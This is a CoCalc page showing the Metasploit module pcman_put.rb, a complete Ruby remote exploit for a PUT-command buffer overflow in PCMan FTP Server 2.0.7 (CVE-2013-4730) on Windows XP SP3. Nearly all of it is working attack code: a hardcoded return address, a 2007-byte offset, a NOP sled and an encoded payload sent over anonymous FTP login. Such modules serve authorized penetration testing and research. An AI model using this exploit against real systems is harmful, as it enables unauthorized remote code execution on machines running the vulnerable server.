CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/ftp/pcman_put.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(update_info(info,12'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',13'Description' => %q{14This module exploits a buffer overflow vulnerability found in the PUT command of the15PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous16credentials are enabled.17},18'Author' =>19[20'Jay Turla', # Initial Discovery -- @shipcod321'Chris Higgins' # msf Module -- @ch1gg1ns22],23'License' => MSF_LICENSE,24'References' =>25[26[ 'CVE', '2013-4730' ],27[ 'EDB', '37731'],28[ 'OSVDB', '94624']29],30'DefaultOptions' =>31{32'EXITFUNC' => 'process'33},34'Payload' =>35{36'Space' => 1000,37'BadChars' => "\x00\x0A\x0D",38},39'Platform' => 'win',40'Targets' =>41[42[ 'Windows XP SP3 English',43{44'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll45'Offset' => 200746}47],48],49'DisclosureDate' => '2015-08-07',50'DefaultTarget' => 0))51end5253def post_auth?54true55end5657def check58connect_login59disconnect6061if /220 PCMan's FTP Server 2\.0/ === banner62Exploit::CheckCode::Appears63else64Exploit::CheckCode::Safe65end66end676869def exploit70connect_login7172print_status('Generating payload...')73sploit = rand_text_alpha(target['Offset'])74sploit << [target.ret].pack('V')75sploit << make_nops(16)76sploit << payload.encoded7778send_cmd( ["PUT", sploit], false )79disconnect80end81end828384